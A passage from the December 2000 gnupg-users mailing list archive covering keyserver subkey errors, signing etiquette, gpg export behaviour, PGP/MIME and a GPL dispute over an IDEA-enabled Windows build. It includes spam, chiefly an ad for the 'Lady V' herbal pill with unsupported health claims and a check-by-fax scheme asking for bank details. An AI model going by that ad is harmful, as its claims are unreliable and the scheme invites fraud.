ECneWfa8INP79WJjAiR7az0= =U7+M -----END PGP SIGNATURE----- --nFreZHaLTZJo0R7j-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stefan@epy.co.at Sat Dec 16 00:10:59 2000 From: stefan@epy.co.at (Stefan H. Holek) Date: Sat, 16 Dec 2000 01:10:59 +0100 (CET) Subject: GPG key not fully accepted by public key servers In-Reply-To: <20001215143216.A9955@sistina.com> Message-ID: On Fri, 15 Dec 2000 lewis@sistina.com wrote: > I have a public key that has two subkeys. One is an encryption subkey with > expiration date, and the other is a signing subkey with expiration date. [snip] > When I submit this public key to a keyserver such as > http://pgp.ai.mit.edu/ I get this error: [snip] > The last error was on key 0xee72a386: > Key block corrupt: more than one signature on subk I have also seen this. The culprit seems to be the pks-type keyserver. Currently no solution, AFAIK. You might want to use the NAI keyservers until this is resolved. > The interesting thing is that part of the key is accepted so people can still > download it, but I use the second subkey for most of my signing, and that is > truncated from the key. Does anyone know why this would be? I can send my My current assessment is that the pks is stripping off "subkey binding signatures", leaving the key in a crippled state. I believe it only happens when adding a new key, adding a subkey to an existing key appears to fail entirely. If people can download your key they must furthermore be using pgp, because gpg does not import such a key. I have also tried to use a broken key for encryption in pgp, but it did not work. Has somebody successfully encrypted mail to you using your freshly downloaded key? Regards, Stefan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stefan@epy.co.at Sat Dec 16 00:52:45 2000 From: stefan@epy.co.at (Stefan H. Holek) Date: Sat, 16 Dec 2000 01:52:45 +0100 (CET) Subject: GPG key not fully accepted by public key servers In-Reply-To: <20001215160843.A11168@sistina.com> Message-ID: On Fri, 15 Dec 2000 lewis@sistina.com wrote: > On Fri, Dec 15, 2000 at 04:01:39PM -0600, Brian Minton wrote: > > On Fri, Dec 15, 2000 at 02:32:16PM -0600, lewis@sistina.com wrote: > > > Key block corrupt: more than one signature on subk > > > > what happens when you do gpg --export 00292648 |gpg --list-packets ? > You have to examine the key *returned* from the keyserver. Gpg will not import such a key, but you can download and then export it with pgp or cut & paste it from the web interface. You will see something like this (two subkeys and only one binding signature): $ gpg --list-packets test.asc :public key packet: version 4, algo 17, created 976788814, expires 0 pkey[0]: [1024 bits] pkey[1]: [160 bits] pkey[2]: [1024 bits] pkey[3]: [1024 bits] :user ID packet: "Testinger " :signature packet: algo 17, keyid 6EF5D2F9EF2AF055 version 4, created 976788814, md5len 0, sigclass 10 digest algo 2, begin of digest bb a4 hashed subpkt 2 len 5 (sig created 2000-12-14) hashed subpkt 9 len 5 (key expires after 5y1d0h0m) hashed subpkt 11 len 5 (pref-sym-algos: 3 2 1 10) hashed subpkt 25 len 2 (primary user ID) hashed subpkt 27 len 5 (key flags: 03 00 00 00) subpkt 16 len 9 (issuer key ID 6EF5D2F9EF2AF055) data: [155 bits] data: [158 bits] :public sub key packet: version 4, algo 16, created 976748400, expires 0 pkey[0]: [2048 bits] pkey[1]: [2 bits] pkey[2]: [2046 bits] :public sub key packet: version 4, algo 16, created 1008284400, expires 0 pkey[0]: [2048 bits] pkey[1]: [2 bits] pkey[2]: [2045 bits] :signature packet: algo 17, keyid 6EF5D2F9EF2AF055 version 4, created 976790552, md5len 0, sigclass 18 digest algo 2, begin of digest bd c7 hashed subpkt 2 len 5 (sig created 2000-12-14) hashed subpkt 9 len 5 (key expires after 1y0d0h0m) hashed subpkt 27 len 5 (key flags: 0C 00 00 00) subpkt 16 len 9 (issuer key ID 6EF5D2F9EF2AF055) data: [160 bits] data: [159 bits] -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From trappedvector@crosswinds.net Fri Dec 15 21:43:03 2000 From: trappedvector@crosswinds.net (Martin) Date: Fri, 15 Dec 2000 22:43:03 +0100 Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001214180848.K23140@gnupg.de>; from wk@gnupg.org on Thu, Dec 14, 2000 at 06:08:48PM +0100 References: <20001214093003.C7654@berbee.com> <20001214161817.B10991@nmrc.ie> <20001214180848.K23140@gnupg.de> Message-ID: <20001215224303.A370@crosswinds.net> --qDbXVdCdHGoSgWSk Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thursday, December 14, 2000 (CS:4.50.349) 18:08:48 [PM] (+0100) Werner Koch [wk@gnupg.org] wrote... > On Thu, 14 Dec 2000, Lars Hecking wrote: >=20 > > IMHO signing list email is a useless and wasteful exercise, especially > > if the sender hasn't submitted his/her keys to the public keyservers. >=20 > Well, that depends on the content of the mail. But you are right, > for the bulk of ML traffic, there is no need for signing. >=20 > Werner It you dont upload your key to the keyservers signing is useless and=20 wasteful. On the other hand any signature is (mostly) a waste of bandwith! BB mh --=20 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -= - - No signature - Saving bandwith! - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -= - - --qDbXVdCdHGoSgWSk Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) iD8DBQE6OpBnffxhyW5sNDERApwqAJwP2U/KOGcaSfnV/9GjMkxVXrmn6gCgi2YU 79YYk5I2GrQxzXLIc+1W6ds= =/+ch -----END PGP SIGNATURE----- --qDbXVdCdHGoSgWSk-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From evangelo@pigdog.org Sat Dec 16 08:51:02 2000 From: evangelo@pigdog.org (ESP) Date: 16 Dec 2000 00:51:02 -0800 Subject: Question regarding clearsigning emails automatically In-Reply-To: Martin's message of "Fri, 15 Dec 2000 22:43:03 +0100" References: <20001214093003.C7654@berbee.com> <20001214161817.B10991@nmrc.ie> <20001214180848.K23140@gnupg.de> <20001215224303.A370@crosswinds.net> Message-ID: <87r938eoll.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 >>>>> "M" == Martin writes: M> On the other hand any signature is (mostly) a waste of M> bandwith! As you've so kindly demonstrated, so is most list traffic. ~ESP - -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ESP | http://pigdog.org/ "Fan belts break at 3AM. I get mad, drinks get spilled." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) iD8DBQE6OyzxbZezvPSYodkRAv0sAJ9cSZmP1oGOt5QXdrjl+VbHFWo3mACdEoc3 kWCJIqMuATLqe8xqXNC+Yx4= =r62T -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From minton@csc.smsu.edu Sat Dec 16 18:42:49 2000 From: minton@csc.smsu.edu (Brian Minton) Date: Sat, 16 Dec 2000 12:42:49 -0600 Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001215224303.A370@crosswinds.net>; from trappedvector@crosswinds.net on Fri, Dec 15, 2000 at 10:43:03PM +0100 References: <20001214093003.C7654@berbee.com> <20001214161817.B10991@nmrc.ie> <20001214180848.K23140@gnupg.de> <20001215224303.A370@crosswinds.net> Message-ID: <20001216124247.B638@aspirin.smsu.edu> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, Dec 15, 2000 at 10:43:03PM +0100, Martin wrote: > It you dont upload your key to the keyservers signing is useless and > wasteful. yes, but not completely, since at a later time, you can always produce your public key at a later time if necessary to prove that you did in fact write a given message, or that you did not. However, except for special circumstances, I can't imagine any reason not to send your public key to the keyserver, especially if you are going to be publishing (eg on a list) signed material. > On the other hand any signature is (mostly) a waste of bandwith! > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - > No signature - Saving bandwith! > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - and yet you signed the message :-) - -- Brian Minton minton@csc.smsu.edu Caution: in case of rapture, this computer will be unoccupied! PGP 0xE177AFF0 fingerprint AB94 E395 78CE 0967 2542 A7B3 178C 3E66 E177 AFF0 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6O7d6p0PPDCS0QgIRAhzgAJwPdZMBCN4X3k9I4mEjCiJQ9S+D1wCfVDBF aGxAl3k3B/FBJPo8fJKx5yQ= =BalB -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From trappedvector@crosswinds.net Sat Dec 16 22:00:34 2000 From: trappedvector@crosswinds.net (Martin) Date: Sat, 16 Dec 2000 23:00:34 +0100 Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001216124247.B638@aspirin.smsu.edu>; from minton@csc.smsu.edu on Sat, Dec 16, 2000 at 12:42:49PM -0600 References: <20001214093003.C7654@berbee.com> <20001214161817.B10991@nmrc.ie> <20001214180848.K23140@gnupg.de> <20001215224303.A370@crosswinds.net> <20001216124247.B638@aspirin.smsu.edu> Message-ID: <20001216230034.A404@crosswinds.net> --Q68bSM7Ycu6FN28Q Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Saturday, December 16, 2000 (CS:6.50.351) 12:42:49 [PM] (-0600) Brian Minton [minton@csc.smsu.edu] wrote... > yes, but not completely, since at a later time, you can always produce yo= ur > public key at a later time if necessary to prove that you did in fact wri= te a > given message, or that you did not. =20 ^^^^^^^^^^^^^^^^^^^^ Thats not possible! If you signed a message (which you do with your private key) and i verify it with your public key (and im sure its yours) i can be= =20 sure YOU and nobody else wrote that message. If you generate a new key pair i would see that and would still have you public key. Wait a sec.=20 > you can always produce your public key at a later time Do you mean to *upload* your public key at a later time? Then you are right. I never thought about that. To upload you key later to prove you did write a message works. But you cant prove you didnt! What if you just generate a new one? =3D=3D=3D=3D> This message is not from me. Thats not my public key! See! > However, except for special > circumstances, I can't imagine any reason not to send your public key to = the > keyserver, especially if you are going to be publishing (eg on a list) si= gned > material. agree > and yet you signed the message :-) see the joke there...? CYL mh --=20 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -= - - Linux - its only limit is its physical environment - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -= - - --Q68bSM7Ycu6FN28Q Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) iD8DBQE6O+YCffxhyW5sNDERAi8WAKCDenU3xxlEr3Qms5fz3JX4WrNOnQCgo1yY PCzdaUS0XKxQlE0H30EN84Y= =S7be -----END PGP SIGNATURE----- --Q68bSM7Ycu6FN28Q-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From minton@csc.smsu.edu Sun Dec 17 02:36:07 2000 From: minton@csc.smsu.edu (Brian Minton) Date: Sat, 16 Dec 2000 20:36:07 -0600 Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001216230034.A404@crosswinds.net>; from trappedvector@crosswinds.net on Sat, Dec 16, 2000 at 11:00:34PM +0100 References: <20001214093003.C7654@berbee.com> <20001214161817.B10991@nmrc.ie> <20001214180848.K23140@gnupg.de> <20001215224303.A370@crosswinds.net> <20001216124247.B638@aspirin.smsu.edu> <20001216230034.A404@crosswinds.net> Message-ID: <20001216203604.A1580@aspirin.smsu.edu> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Sat, Dec 16, 2000 at 11:00:34PM +0100, Martin wrote: > On Saturday, December 16, 2000 (CS:6.50.351) 12:42:49 [PM] (-0600) > Brian Minton [minton@csc.smsu.edu] wrote... > > > yes, but not completely, since at a later time, you can always produce your > > public key at a later time if necessary to prove that you did in fact write a > > given message, or that you did not. > ^^^^^^^^^^^^^^^^^^^^ > Thats not possible! If you signed a message (which you do with your private > key) and i verify it with your public key (and im sure its yours) i can be > sure YOU and nobody else wrote that message. > If you generate a new key pair i would see that and would still have you > public key. okay, that makes sense. If you upload your key, and send messages with it, and have several people who are associated with you in real life, there is a pretty good chance that the key is in fact your key. The only possible scenario in which you might be able to prove (or at least indicate) that you didn't write a message, would be if it was *purportedly* signed with your key, but the signature doesn't verify. However, even then, that is not really proof. However, I stand by my statement that you might need to prove that you did write a message. On the gripping hand, that still doesn't give any plausible scenario for not sending your key. Given that the keyservers may be accessed through email and http, as well as the modified http used normally, I don't see any reason for someone to be sending messages to a public forum and not sending the public key to the keyserver. Mind you in a closed setting such as a corporate intranet, with messages not going out to the internet, I suppose you wouldn't need to, but otherwise, I don't see any reason why people don't do it, except that perhaps they aren't aware of the existence of the public keyservers. - -- Brian Minton minton@csc.smsu.edu Caution: in case of rapture, this computer will be unoccupied! PGP 0xE177AFF0 fingerprint AB94 E395 78CE 0967 2542 A7B3 178C 3E66 E177 AFF0 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6PCZXp0PPDCS0QgIRAk2XAJ4uNlqO0I8ml+SDb2v51uGeTjbDKwCfRvXj 2egxaSe8fCC+xO/bJ579fhk= =cLcF -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From LadyV@ladiesfirst.de Sun Dec 17 10:24:15 2000 From: LadyV@ladiesfirst.de (LadyV@ladiesfirst.de) Date: Sun, 17 Dec 2000 11:24:15 +0100 Subject: Lady V: The Pleasure Pill for Women! Message-ID: <200012171024.eBHAOFR29262@mail.hsp.de> LADY V: The Pleasure Pill for Women! Men Have Their Viagra®! Finally, A Pill for Women! It's Here! The Revolutionary Woman's Sexual Sensation is Now Available. Researchers are calling Lady V the greatest breakthrough for women since the Birth Control Pill. And you don't even need a prescription to get it! Welcome to the New Sexual Revolution! It's no secret that men have been having the time of their lives since the wonder pill Viagra® was made available. But, women were left out in the cold with no pill... nothing! Well now thanks to an all-star team of medical researchers who have been working around the clock, those days are finally over. The perfect female "pleasure pill" has been created and you don't even need a prescription. You can now get it from Lion Sciences! Lady V is the world's first pleasure pill scientifically designed for women. Lady V is an all-natural proprietary herbal blend of prosexual nutrients from around the world synergistically blended to naturally stimulate neurotransmitter endorphin signals. This magical combination increases targeted blood flow, unleashes natural stimulator for maximum stimulation, triggering pleasure responses quickly. Lady V is safe, natural and doctor-recommended. Since its introduction Lady V has been taking the world by storm! >From Malibu to Miami women are enjoying the most intense pleasure of their lives! • 100% Natural • Safe • The Highest Quality Pharmaceutical Pure Nutraceuticals • Guaranteed Potency • Certified Purity Lady V is Sweeping the Nation! Women are going crazy over Lady V. Suddenly couples are falling in love all over again. The passion and pleasure that women are reporting is off the charts! Lady V has an incredible 88% success rate. Best of all, while Viagra costs $10 a pill, Lady V costs less than $1 a pill! It's not just a man's world anymore! Just look at what a few women have to say: "I thought my love life was good before, but now it is out of this world! Lady V is remarkable." — Mary J., Interior Designer "I haven't smiled like this in a long time. My husband and I feel like a couple of 19 year olds again!" — Debra T, Assistant Buyer "Imagine what it would feel like to have incredible passion and pleasure anytime you want." — Jennifer C., Film Editor "Suddenly my husband and I are spending more time in the bedroom instead of the TV room." — Angie R., Realtor Ingredients: Vitamin D, Niacin, Vitamin B6, Folic Acid, Vitamin B12, Avena Sativa, Kava Kava, Guarana, White Willow Extract, Mura Puama, St. John's Wort, Siberian Ginseng, Cordyceps, Damiana, and L-Taurine. Each bottle of Lady V contains 30 tablets. Take three capsules one hour before romantic activity as a dietary supplement. Risk Free: Double Your Money Back Guarantee If Lady V does not give the desired results as stated above, simply return the unused portion for a double-your money back refund. No questions asked! Order Now: Safe, Fast, Secure, Private Lady V with its DOUBLE YOUR MONEY BACK GUARANTEE is available only through this special promotional offer. Herbal V arrives in plain packaging for your privacy. Any and all information is kept strictly confidential. Payment Methods You may FAX or Postal Mail Checks, MasterCard, Visa, & American Express.payments. Money Orders are accepted only by Postal Mail. Each bottle of Lady V contains 30 tablets. Step 1: Place a check by your desired quanity. ______ 1 Bottle of Lady V $26 ______ 2 Bottles of Lady V $46 ______ 3 Bottles of Lady V $59 Please add $6 shipping and handling for any size order. [ Total cost including shipping & handling, 1 bottle=$32, 2 bottles=$52, 3 bottles=$65 ] International Orders Please add $18 shipping and handling for any size order. [ Total cost including shipping & handling, 1 bottle=$43, 2 bottles=$63, 3 bottles=$77 ] We cannot accept foreign checks. International money orders or credit cards only. Step 2: Place a check by your desired payment method and complete fields if necessary. _____Check or CHECK-BY-FAX [details below] _____Money Order _____American Express Account Number__________________ Exp____/____ _____Visa Account Number__________________ Exp____/____ _____MasterCard Account Number__________________ Exp____/____ Please make your check or money order payable to "LSN". Step 3: Please complete and print the following fields clearly. Name ___________________________________________________ Address _________________________________________________ City ____________________________________________________ State ___________________________________________________ Zip _____________________________________________________ E-mail __________________________________________________ Signature _________________________________________________ [ required for check and credit card orders] Toll Free FAX Order Line: 1-800-940-6590 If faxing in your order, please state whether you require a fax, email, or no confirmation at all. Allow up to one day for confirmation, if requested. FAX orders are processed immediately. Or, print & mail to: LSN 273 S. State Rd. 7, #193 Margate, FL 33068-5727 ______________________________________________________ *CHECK BY FAX ORDERS: Complete the check as normal. Tape the check in the area below. Below the check, clearly write the check number, all numbers at the bottom of the check, & your name. Tape the check below and fax the check to the toll free FAX number above. Void the check. Our merchant will electronically debit your account for the amount of the check; your reference number for this transaction will be your check number. Nothing could be safer & easier ! TAPE CHECK BELOW _____________________________________________________________ This is a one time mailing: Removal is automatic and no further contact is necessary. Please Note: Lady V is not intended to diagnose, treat, cure or prevent any disease. As individuals differ, so will results. Lady V helps provide herbal and nutritional support for female sexual performance. The FDA has not evaluated these statements. For details about our double your money back guarantee, please write to the above address, attention consumer affairs department; enclose a self addressed stamped envelope for this and any requested contact information. Thank You. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From brian.galbraith@bigfoot.com Sun Dec 17 16:06:34 2000 From: brian.galbraith@bigfoot.com (Brian Galbraith) Date: Sun, 17 Dec 2000 16:06:34 +0000 Subject: Symmetric encryption Message-ID: <20001217160634.6ed05f3f.brian.galbraith@bigfoot.com> It's a while since I used the symmetric encryption facility og GnuPG, and currently it does not appear to work for me. Is it broken on build 1.0.4b? Regards Brian -- Brian Galbraith [ Sylpheed 0.4.9pre1]| GnuPG 1.0.4b | SuSE Linux 7.0 ] Encrypted Mail Preferred http://the.earth.li:11371/pks/lookup?op=get&search=0x63EBA765 Hushmail Secure Webmail: bgalbraith@cyber-rights.net -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From andrew@mcdonald.org.uk Sun Dec 17 16:29:32 2000 From: andrew@mcdonald.org.uk (Andrew McDonald) Date: Sun, 17 Dec 2000 16:29:32 +0000 Subject: question regarding gnupg in my regular signature In-Reply-To: <20001214192642.18E1.GRAHAM@todd276.worldonline.co.uk>; from graham@todd276.worldonline.co.uk on Thu, Dec 14, 2000 at 07:36:33PM +0000 References: <20001213230627.26F3.GRAHAM@todd276.worldonline.co.uk> <20001214191017.B688@mcdonald.org.uk> <20001214192642.18E1.GRAHAM@todd276.worldonline.co.uk> Message-ID: <20001217162932.A639@mcdonald.org.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Thu, Dec 14, 2000 at 07:36:33PM +0000, Graham wrote: > AM> > AM> PGP/MIME has advantages over the older application/pgp format, and it > AM> would be nice to see it supported by all the mailers that offer "pgp > AM> support". The pgp/mime standard in rfc2015 is 4 years old, and lots of > AM> MUAs seem to support S/MIME. :) > AM> RFC 2440, does after all say: "An application that implements OpenPGP > AM> for messaging SHOULD implement OpenPGP-MIME." (See RFC2119 for the > AM> meaning of 'SHOULD'). > > You're probably right, but specifically what advantages? Some are advantages for the mailer, e.g. single MIME standard for encrypted/signed e-mail (PGP/MIME is essentially the same as S/MIME in its basic structure). Some for the user, e.g. you can encrypt and sign attachments along with the e-mail body, you can extract the original message without having to pull off the PGP wrappings yourself. The first of those two is probably one I find most useful. AFAIK, with the Outlook plug-in you would need to separately encrypt/sign any attachments first (I'll double check that tomorrow). I think the 'clear-signing' method was probably created because, at the time, there was no other way to do it. I think with MIME as a standard PGP/MIME somehow becomes 'more obvious'. > PGP has a plug-in which integrates more seamlessly with Outlook than > Eudora or Outlook Express. The problem I would think is that you're > trying to get a MUA (Mutt) which defaults to PGP/MIME under Linux, to > produce something which can be understood by a Windows application > (Outlook) for which there is no PGP/MIME support. Despite somebody > telling me that this difference is not an OS problem, but an > application problem, most Windows MUAs do not have PGP/MIME support if > they have PGP. Actually, I think there are probably quite a few more MUAs under Linux that support PGP in a non-PGP/MIME form than support PGP/MIME. With the Outlook plug-in, it simply processes the content of the text edit window, getting it to do the header/structure modifications for PGP/MIME (or even setting the content-type to application/pgp) is probably more difficult to do from a plug-in. > AM> By terming my macros "a bit of a cludge". I meant that mutt's PGP/MIME > AM> support was so nice, easy and clean to use; using these macros seem > AM> very horrible in comparison. :( > > I understand that, but for we Windows users, PGP/MIME seems so > unwieldy, so non-standard, and suspicious as we try to avoid > attachments.... Its just your point of view.... Well, if the mailer supported PGP/MIME you wouldn't see any attachments, just as you don't with an MUA that supports S/MIME on S/MIME encoded messages. ;-) Best wishes, Andrew - -- Andrew McDonald E-mail: andrew@mcdonald.org.uk http://www.mcdonald.org.uk/andrew/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6POnl/LupyPLe7TYRAkqCAJ9/9v6+0yzO3H/aHeQ/2uGaTnpHFACghSJU KREdH5ZLR1JZYlcnIYb9hT4= =e4d0 -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From yj4BvSr0D@myfreeoffice.com Sun Dec 17 01:05:58 2000 From: yj4BvSr0D@myfreeoffice.com (yj4BvSr0D@myfreeoffice.com) Date: 17 Dec 00 1:05:58 AM Subject: FWD: FROM JOHN Message-ID: CHECK THIS OUT. JOHN SENT IT TO ME, I THOUGHT YOU WOULD BE INTERESTED! HTTP://www.geocities.com/newestpage5543/ipb.html TO BE REMOVED FROM ALL FUTURE EMAILS, SIMPLY REPLY WITH "REMOVE" IN THE SUBJECT LINE -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Darxus@ChaosReigns.com Sun Dec 17 17:53:12 2000 From: Darxus@ChaosReigns.com (Darxus@ChaosReigns.com) Date: Sun, 17 Dec 2000 12:53:12 -0500 Subject: faulty behavior of gpg --export string1 Message-ID: <20001217125312.C233@chaosreigns.com> --opJtzjQTFsWo+cga Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable When I do "gpg --list-keys string", it lists every key containing "string" in the name or email address. But when I do a "gpg --export string", it only exports the first key that matches "string". The easiest way I've found to test this is=20 "gpg --export string | gpg", which will list the names of all the keys that you exported. So to achieve the same functionality I'm looking for from "gpg --export string", I have to do something like: gpg --export `gpg --list-keys string | grep ^pub | cut -d'/' -f2 | cut -d' = ' -f1` --=20 http://www.ChaosReigns.com --opJtzjQTFsWo+cga Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6PP2If7Wwvg6f+HkRAu7zAJ9f+Jsh13KNTSBwRA7Px8fnSbJxigCfT9VQ EB29Q3mHFnLGaaDfJacfqnE= =zOkO -----END PGP SIGNATURE----- --opJtzjQTFsWo+cga-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Darxus@ChaosReigns.com Sun Dec 17 18:37:58 2000 From: Darxus@ChaosReigns.com (Darxus@ChaosReigns.com) Date: Sun, 17 Dec 2000 13:37:58 -0500 Subject: "Name must be at least 5 characters long" Message-ID: <20001217133757.B21064@chaosreigns.com> I object. My public key is: pub 1024D/0E9FF879 2000-09-05 Darxus Having the extra "Darxus" in there is extraneous. An older key of mine, generated probably with an old version of pgp, is this: pub 1024R/FE3821D9 1998-12-12 darxus@op.net sig! FE3821D9 1998-12-12 darxus@op.net ..which works fine. So it appears possible for a valid key to exist without a name field at all. gpg is just being a pain in not letting me do what I want. -- http://www.ChaosReigns.com -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Darxus@ChaosReigns.com Sun Dec 17 19:09:50 2000 From: Darxus@ChaosReigns.com (Darxus@ChaosReigns.com) Date: Sun, 17 Dec 2000 14:09:50 -0500 Subject: "Name must be at least 5 characters long" In-Reply-To: <20001217133757.B21064@chaosreigns.com>; from Darxus@ChaosReigns.com on Sun, Dec 17, 2000 at 01:37:58PM -0500 References: <20001217133757.B21064@chaosreigns.com> Message-ID: <20001217140950.D21064@chaosreigns.com> My most humble apologies for wasting your time.... --allow-freeform-uid Disable all checks on the form of the user ID while generating a new one. This option should only be used in very special environments as it does not ensure the de-facto standard format of user IDs. ..found this as I was about to modify the source to let me do it. -- http://www.ChaosReigns.com -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From 6KkA6cn0U@myfreeoffice.com Sun Dec 17 03:50:07 2000 From: 6KkA6cn0U@myfreeoffice.com (6KkA6cn0U@myfreeoffice.com) Date: 17 Dec 00 3:50:07 AM Subject: FWD: MORE INFO ON THE PHONE SERVICE Message-ID: You Are Receiveing This Again, Due To Another Typo In The Last Web Address. $99 Flatrate Longdistance STATE TO STATE / UNLIMITED CALLS GET RID OF THOSE HUGE LONG DISTANCE BILLS. DOESN'T TAKE AWAY FOCUS FROM YOUR PRIMARY PROGRAM!! SO... GET YOUR WHOLE DOWNLINE ON IT FOR RAPID GROWTH IN YOUR CURRENT PROGRAM!! http://www.geocities.com/redir13321/redirect.html This Is A Weekly Mail List. To Be Removed Permanently Email permenentremoval@excite.com with "remove" somewhere in the subject line. PERMANENT REMOVAL!! (May Take 1-2 days to be completely off all lists) -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Mon Dec 18 13:05:34 2000 From: wk@gnupg.org (Werner Koch) Date: Mon, 18 Dec 2000 14:05:34 +0100 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <976900291.3a3a50c3ac947@nullify.org>; from aphex@nullify.org on Fri, Dec 15, 2000 at 11:11:31AM -0600 References: <976900291.3a3a50c3ac947@nullify.org> Message-ID: <20001218140534.E12265@gnupg.de> On Fri, 15 Dec 2000, Keith Ray wrote: > I have been able to successfully cross-compile GnuPG 1.0.4-1 to include the > IDEA cipher for Windows. Since this binary now includes both RSA and IDEA, it > should be fully backwards compatible with PGP 2.6.x. > > The following changes were made from a "standard" cross-compile: > 1. Statically linked idea.c. Unlike Cygwin, this release requires no DLLs. By releasing this software you are violating the GPL: 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. Please stop distributing this release. > extensive testing so use caution. The binary can be downloaded at > www.nullify.org. Please email me if you have any questions or problems. If you are providing the binary, you have to provide the source too. One hint: By releasing a patch to GnuPG under a license which does not have the patent clause and is compatible with the GPL, you can avoid the GPL violation. Frankly, this is the reason why those modules are there. The GNU project does not distribute them but a user may choose to acquire them and use them together with GnuPG. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Florian.Weimer@RUS.Uni-Stuttgart.DE Mon Dec 18 14:51:51 2000 From: Florian.Weimer@RUS.Uni-Stuttgart.DE (Florian Weimer) Date: 18 Dec 2000 15:51:51 +0100 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <20001218140534.E12265@gnupg.de> References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> Message-ID: Werner Koch writes: > > 1. Statically linked idea.c. Unlike Cygwin, this release requires > > no DLLs. > > By releasing this software you are violating the GPL: No, he isn't. > 7. If, as a consequence of a court judgment or allegation of > patent infringement or for any other reason There is neither a court judgment or allegation of patent infringement. Things may change quite rapidly as soon as he gets a cease and desist letter, but the current situation---distributing GPLed source (and binaries) which clearly infringes some software patents--is common practice (even the FSF does it, see the networking code in GNU libc, and GnuPG's crypto algorithms except Rijndael are probably candidates as well). -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lhecking@nmrc.ie Mon Dec 18 15:04:53 2000 From: lhecking@nmrc.ie (Lars Hecking) Date: Mon, 18 Dec 2000 15:04:53 +0000 Subject: Test failure on NetBSD Message-ID: <20001218150453.A23106@nmrc.ie> The conventional-mdc.test fails on 